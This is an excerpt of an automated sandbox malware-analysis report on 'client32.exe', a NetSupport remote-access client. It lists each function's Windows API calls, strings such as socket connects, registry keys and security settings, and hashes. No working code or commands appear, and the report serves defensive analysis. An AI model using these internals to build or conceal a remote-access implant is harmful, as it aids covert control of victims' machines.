                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$DeferRect$BeginClassClientCopyLongName
                                                        • String ID: NSMCoolbar
                                                        • API String ID: 1900817757-4124301854
                                                        • Opcode ID: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
                                                        • Instruction ID: 697ac5a8752ed506828de34cf2428e8b9a6e2033c0f369928a21e8fa57bdad73
                                                        • Opcode Fuzzy Hash: 721ac4e266f96a4a850d5aaf4f4e1e8e70e9fe7eb07aeeafc09c1b7f71e7420c
                                                        • Instruction Fuzzy Hash: 7741AF75E00699AFDB01CF64D8C5AEDFBF5EF49318F1081A9EC95A7240EB329900CB54
                                                        Function 110CD040 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,82E0FB89,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD0C0
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                        • gethostbyname.WSOCK32(111D8BD0,82E0FB89,00000000,?,00000000), ref: 110CD0D5
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174E50,000000FF), ref: 110CD0E1
                                                        • _memmove.LIBCMT ref: 110CD10B
                                                        • htons.WSOCK32(00000000), ref: 110CD131
                                                        • socket.WSOCK32(00000002,00000001,00000000), ref: 110CD141
                                                        • WSAGetLastError.WSOCK32 ref: 110CD14F
                                                        • connect.WSOCK32(?,?,00000010,?,00000000,000000FF,111D8BE8,00000000,000000FF), ref: 110CD183
                                                        • WSAGetLastError.WSOCK32 ref: 110CD18E
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        • Connect() the socket is not closed, xrefs: 110CD08D
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
                                                        • String ID: Connect() the socket is not closed
                                                        • API String ID: 2474459257-1125742345
                                                        • Opcode ID: b1656292a129f8f09a8c7e2961585d639d76e0250c0e1a8987911da478ec1647
                                                        • Instruction ID: ccd0812ce5c4b190832bbbc4611eee6a3b7bdca2a255a4473ecf135b367f79d4
                                                        • Opcode Fuzzy Hash: b1656292a129f8f09a8c7e2961585d639d76e0250c0e1a8987911da478ec1647
                                                        • Instruction Fuzzy Hash: 40417F75D00609AFDB10DFA4C984B9EF7B4FF48B14F10465EE826A7280EB34AA04CF94
                                                        Function 11059170 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 126sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11133F90: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                          • Part of subcall function 11133F90: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                        • wsprintfA.USER32 ref: 110591DE
                                                        • CloseHandle.KERNEL32(?), ref: 11059228
                                                        • WaitForInputIdle.USER32(?,00001388), ref: 1105923D
                                                        • Sleep.KERNEL32(00000064), ref: 11059271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseFileHandleIdleInputModuleNameSleepWaitwsprintf
                                                        • String ID: %s%s$Cobrowse FindWindow ret %x$Cobrowse WaitForInputIdle ret %x$NSMCobrMain$NSMCobrProxy$client32.exe /cobrowse
                                                        • API String ID: 1983868302-3988794623
                                                        • Opcode ID: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
                                                        • Instruction ID: 64ff9cb93a9663605cfd89a277c98985d389e2c617dc2113b1a8173dc2104267
                                                        • Opcode Fuzzy Hash: 6c1afc4eae45db93175f885578682ff7c5dcd0a4c08b2a706085d4d78dcd34c2
                                                        • Instruction Fuzzy Hash: ED41B275E00305AFDB60DF64CC85FDAB7F5EB49748F0085A9FA19A7280EB70A900CB61
                                                        Function 11015570 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 123registrytimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 11015588
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 110155E4
                                                        • RegisterClassA.USER32(00000003), ref: 110155FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101565F
                                                        • UpdateWindow.USER32(00000000), ref: 110156AD
                                                        • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110156E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                        • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 1905683801-829434836
                                                        • Opcode ID: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
                                                        • Instruction ID: 5d7763ff052535f15a435ab75112d1ab5b6a36c9cbb3a02e710fd65c9b1f1a2f
                                                        • Opcode Fuzzy Hash: d3c1f65075277e3a1e6953d20af43a3d98eef37c275395219bf04279b5829960
                                                        • Instruction Fuzzy Hash: 174131B5E00205AFDB11CFA9DC84BDEFBF8EB48308F10852AE518A7644E775A540CF95
                                                        Function 1102B140 Relevance: 16.7, APIs: 1, Strings: 10, Instructions: 197sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(000001F4,000000D0,11043E30,00000000), ref: 1102B2F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: *channel$CLIENT32.CPP$Client$Eval$IsA()$SetChannel(%s), oldchan=<%s>$_License$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$gMain.cfg == m_cfg$licensee
                                                        • API String ID: 3472027048-3511930441
                                                        • Opcode ID: 83fb0e30d710a8545d2df3fc2a43f17ed3962404db71377e151b0bf2a2734884
                                                        • Instruction ID: 4d6f59fa27967af7cb4369fcdfea8b63f9a66c189d59db9a75944a8f7c73a5dd
                                                        • Opcode Fuzzy Hash: 83fb0e30d710a8545d2df3fc2a43f17ed3962404db71377e151b0bf2a2734884
                                                        • Instruction Fuzzy Hash: 98717C38E00A06ABDB15DB95DC94FEEF775AF58708F508158E92177284DB70B904CBA1
                                                        Function 11037540 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset_strncpy
                                                        • String ID: Client$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
                                                        • API String ID: 3140232205-3449891838
                                                        • Opcode ID: 590b2bcb691e3b6a15250803a6b5b66dbbf136148ffd1a16c0b18f4875028790
                                                        • Instruction ID: 08675ffc2996a9994ec77ae635d004e2547b145dc9a4bb826478d0f5d07006d3
                                                        • Opcode Fuzzy Hash: 590b2bcb691e3b6a15250803a6b5b66dbbf136148ffd1a16c0b18f4875028790
                                                        • Instruction Fuzzy Hash: 4461D97590061B9FD711CF28DD94FDAB7A8AF95308F0481D4E99997241EB70FA48CBD0
                                                        Function 11055550 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 172synchronizationtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,82E0FB89,?,?), ref: 11055599
                                                        • EnterCriticalSection.KERNEL32(?,?,?), ref: 11055620
                                                        • timeGetTime.WINMM(?,?), ref: 1105564C
                                                        • LeaveCriticalSection.KERNEL32(?,?,?), ref: 110556FA
                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 11055714
                                                        • LeaveCriticalSection.KERNEL32(?,?,?), ref: 11055739
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave$ObjectSingleTimeWaittime
                                                        • String ID: _License$maxslaves
                                                        • API String ID: 2566820294-253336860
                                                        • Opcode ID: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
                                                        • Instruction ID: 48dbc85ab943934b8a84466f30def54263bd35f2e1c3ca06f7287a6687e73580
                                                        • Opcode Fuzzy Hash: 85b39d58914408d7a163e2829e83e83e104effb36fc5577ab1e2f1b96c7350b9
                                                        • Instruction Fuzzy Hash: 18619E75E01656DFDBC1CFA5D8C4B5AB7B8FB48708F0445A9E815D7244EB31A800CBA0
                                                        Function 1100B740 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetOverlappedResult.KERNEL32(?,82E0F949,FFFFFFFF,00000001), ref: 1100B78C
                                                        • GetLastError.KERNEL32 ref: 1100B796
                                                        • GetTickCount.KERNEL32 ref: 1100B7F9
                                                        • wsprintfA.USER32 ref: 1100B836
                                                        • ResetEvent.KERNEL32(?), ref: 1100B8EF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
                                                        • String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
                                                        • API String ID: 3598861413-432254317
                                                        • Opcode ID: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
                                                        • Instruction ID: db9b1c3ef7ce759150f8a04d918defbb80db3967ff41a2750ff19611511fa969
                                                        • Opcode Fuzzy Hash: 5a65eb48652872d5814f4f76bc611f026241ddcf49cf48a664d38855d5c02a46
                                                        • Instruction Fuzzy Hash: 965107B9D00A06ABE710DF64CC84ABBB7F8FF45318F448119F56A92281E734B940C765
                                                        Function 110252E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11025323
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                          • Part of subcall function 110EAB20: LoadLibraryA.KERNEL32(Kernel32.dll,82E0FB89,00000002,00000000,00000000), ref: 110EAB5F
                                                          • Part of subcall function 110EAB20: GetCurrentProcessId.KERNEL32 ref: 110EABAA
                                                          • Part of subcall function 110EAB20: GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 110EABB7
                                                          • Part of subcall function 110EAB20: FreeLibrary.KERNEL32(?), ref: 110EAC54
                                                        • wsprintfA.USER32 ref: 11025359
                                                        • wsprintfA.USER32 ref: 110253C5
                                                        • wsprintfA.USER32 ref: 110253FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wsprintf$Library$AddressCurrentFileFreeLoadModuleNameProcProcess_strrchr
                                                        • String ID: %d.exe$TraceModuleName$_Debug$trace$tracefile
                                                        • API String ID: 3659486034-589725905
                                                        • Opcode ID: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
                                                        • Instruction ID: 1d59da684ea919fcfefad1fdef7527821daba306a369c67dcb23b03b15758af2
                                                        • Opcode Fuzzy Hash: a7275773bff2871041cdee74396cf3c916417c8c27af77f7b489e8b866625208
                                                        • Instruction Fuzzy Hash: 57410A35F0011A9BCB01DF659C44AFEF3A8DF8921DF5481A9ED8AD7241EE619944CBD0
                                                        Function 11055110 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,00000000,00000000,771B23A0,110553B7,00000000,00000000), ref: 11055168
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1105528A
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,0002001F,?), ref: 1105521D
                                                        • RegDeleteValueA.ADVAPI32(?,?), ref: 1105523D
                                                        • RegCloseKey.ADVAPI32(?), ref: 11055247
                                                        • SetEvent.KERNEL32(?), ref: 11055280
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$CloseDeleteEnterErrorEventExitLastLeaveMessageOpenProcessValuewsprintf
                                                        • String ID: CltReconn.cpp$SOFTWARE\Productive Computer Insight\Client32\AutoReconnect$gMain.pReconnThread
                                                        • API String ID: 1302350719-2578778249
                                                        • Opcode ID: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
                                                        • Instruction ID: ce719fab2f9905b832c3f41bb8e1db8fccc4b13b2a84366b11d07be144a05397
                                                        • Opcode Fuzzy Hash: 1ed26ea936be5e88d747cbffeef235a5e33d6034bfc5ea2ba229771a93fa66eb
                                                        • Instruction Fuzzy Hash: 4141E476E00615AFDB81CFA4CCC0A9EBBA5FB46754F148269FD15DB240E736E901CB90
                                                        Function 11103160 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111synchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteCriticalSection.KERNEL32(75A37AB0,82E0FB89,?,75A37AA0,00000000,?,00000000,1116FF88,000000FF,?,110B7556), ref: 111031AA
                                                        • EnterCriticalSection.KERNEL32 ref: 111031F5
                                                        • SetEvent.KERNEL32(00000264), ref: 1110321E
                                                        • CloseHandle.KERNEL32(00000264), ref: 11103252
                                                        • WaitForSingleObject.KERNEL32(00000284,000000FF), ref: 11103260
                                                        • CloseHandle.KERNEL32(00000284), ref: 1110326D
                                                        • LeaveCriticalSection.KERNEL32(111DC080), ref: 111032AE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
